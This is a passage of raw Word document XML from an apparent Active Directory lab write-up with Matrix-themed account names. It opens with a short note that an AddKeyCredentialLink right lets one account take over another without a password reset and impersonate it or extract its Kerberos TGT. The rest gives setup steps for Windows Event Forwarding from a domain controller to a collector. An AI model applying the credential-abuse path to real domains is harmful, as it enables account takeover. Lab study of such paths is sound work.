        <w:t>AddKeyCredentialLink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="178F3B02">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>NEBUCHADNEZZAR</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(if you simulate it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="6D56EA1B" w14:textId="35E4E5C1">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>This means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4B8B3AB0" w:rsidP="5E1249AA" w:rsidRDefault="4B8B3AB0" w14:paraId="5EBCB454" w14:textId="5DFBFDDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Morpheus </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="7EC1AF75">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">doesn't need to reset </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6A077FBA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Neo’s </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="7EC1AF75">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EC1AF75" w:rsidP="5E1249AA" w:rsidRDefault="7EC1AF75" w14:paraId="044C0E7B" w14:textId="622020ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="546120E5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Neo </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logged in</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> somewhere, </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="2AFE837E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">Morpheus </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impersonate or extract TGT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="71227919" w14:textId="5D727A68">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5E1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="47CCCF75" w14:textId="7E722B30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5E1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="274ED076" w14:textId="5601536A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="040FE182" w14:paraId="3E4F5C40" w14:textId="2423104A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="796F9FFE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Event Log Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3072640B" w:rsidP="082FBA6D" w:rsidRDefault="3072640B" w14:paraId="70F10793" w14:textId="762DAA98">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3072640B" w:rsidP="082FBA6D" w:rsidRDefault="3072640B" w14:paraId="3898FC4A" w14:textId="5B5CC340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82FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forwarder (Source):</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Domain Controller(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3072640B" w:rsidP="082FBA6D" w:rsidRDefault="3072640B" w14:paraId="6766EAD1" w14:textId="12C2A7B3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82FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Collector (Target):</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows 10 PC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3072640B" w:rsidP="082FBA6D" w:rsidRDefault="3072640B" w14:paraId="55932745" w14:textId="506D3B41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82FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Method:</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Source-Initiated Subscriptions</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via WEF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3072640B" w:rsidP="082FBA6D" w:rsidRDefault="3072640B" w14:paraId="09DB569A" w14:textId="066B71A6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82FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="3072640B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lightweight PoC, lab environments, or small orgs without a SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="082FBA6D" w:rsidP="082FBA6D" w:rsidRDefault="082FBA6D" w14:paraId="5F681C80" w14:textId="2EFD7F93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28D1FE1C" w:rsidP="082FBA6D" w:rsidRDefault="28D1FE1C" w14:paraId="2622B55E" w14:textId="398BE32D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082FBA6D" w:rsidR="28D1FE1C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configure WEF on the Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16EB9444" w:rsidP="082FBA6D" w:rsidRDefault="16EB9444" w14:paraId="3E0B112F" w14:textId="58C73526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082FBA6D" w:rsidR="16EB9444">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Domain Controller, open </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="16EB9444">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="16EB9444">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as administrator. Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="16EB9444">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Winrm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77EED252" w:rsidP="082FBA6D" w:rsidRDefault="77EED252" w14:paraId="61567E10" w14:textId="7DA5CC99">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="77EED252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US"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="77EED252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82FBA6D" w:rsidR="77EED252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US"/>
        </w:rPr>
        <w:t>quickconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77EED252" w:rsidP="082FBA6D" w:rsidRDefault="77EED252" w14:paraId="1C91AE22" w14:textId="1A8705CF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082FBA6D" w:rsidR="77EED252">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open Group Policy Managment Console. Expand the Domain Controllers container and right-click on “</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="455EDA41">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Default Domain Controllers Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="455EDA41">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="455EDA41">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Select Edit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="25FA5FA4" w:rsidP="082FBA6D" w:rsidRDefault="25FA5FA4" w14:paraId="1AAE4D48" w14:textId="752C9908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noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="25FA5FA4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configure collector policy settings</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the GPO:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32AA5668" w:rsidP="082FBA6D" w:rsidRDefault="32AA5668" w14:paraId="4AD88E41" w14:textId="1E3BD986">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer Configuration → Administrative Templates → Windows Components → Event Forwarding → Configure target Subscription Manager. Set to Enabled with the following server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32AA5668" w:rsidP="082FBA6D" w:rsidRDefault="32AA5668" w14:paraId="3DF88B00" w14:textId="00439243">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server=http://10.0.0.5:5985/wsman/SubscriptionManager/</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WEC,Refresh</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44E019C2" w:rsidP="082FBA6D" w:rsidRDefault="44E019C2" w14:paraId="770A02EB" w14:textId="081B210A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noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="44E019C2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger GPO Processing on DC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44E019C2" w:rsidP="082FBA6D" w:rsidRDefault="44E019C2" w14:paraId="72079A6A" w14:textId="1E0B886C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="44E019C2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gpupdate</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="44E019C2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44E019C2" w:rsidP="082FBA6D" w:rsidRDefault="44E019C2" w14:paraId="2431CD1C" w14:textId="69C9A67C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="44E019C2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Restart-Service WinRM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="082FBA6D" w:rsidP="082FBA6D" w:rsidRDefault="082FBA6D" w14:paraId="6A7254F6" w14:textId="5C41BF70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32AA5668" w:rsidP="082FBA6D" w:rsidRDefault="32AA5668" w14:paraId="1AE85069" w14:textId="48D7A61A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082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configure Collector on Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32AA5668" w:rsidP="082FBA6D" w:rsidRDefault="32AA5668" w14:paraId="636E157D" w14:textId="3DAE56A6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082FBA6D" w:rsidR="32AA5668">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="6D722155">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="6D722155">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">client, </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="6D722155">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> add</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="6D722155">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the DC’s </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="6D722155">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="0140AF82">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nebuchadnezzar</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="0140AF82">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="6D722155">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>computer account to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D722155" w:rsidP="082FBA6D" w:rsidRDefault="6D722155" w14:paraId="305667AF" w14:textId="2E17E2D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6D722155">
        <w:rPr/>
        <w:t>Event Log Readers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D722155" w:rsidP="082FBA6D" w:rsidRDefault="6D722155" w14:paraId="4D3B27FB" w14:textId="5510A14A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6D722155">
        <w:rPr/>
        <w:t>Administrators (or use an event collector account with rights)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="144F153A" w:rsidP="082FBA6D" w:rsidRDefault="144F153A" w14:paraId="3F28BD5D" w14:textId="17BA2BED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082FBA6D" w:rsidR="144F153A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable Event Collector Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="144F153A" w:rsidP="082FBA6D" w:rsidRDefault="144F153A" w14:paraId="659E2D45" w14:textId="54B3A78E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/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US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Service -Name </w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
        </w:rPr>
        <w:t>Wecsvc</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="144F153A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US"/>
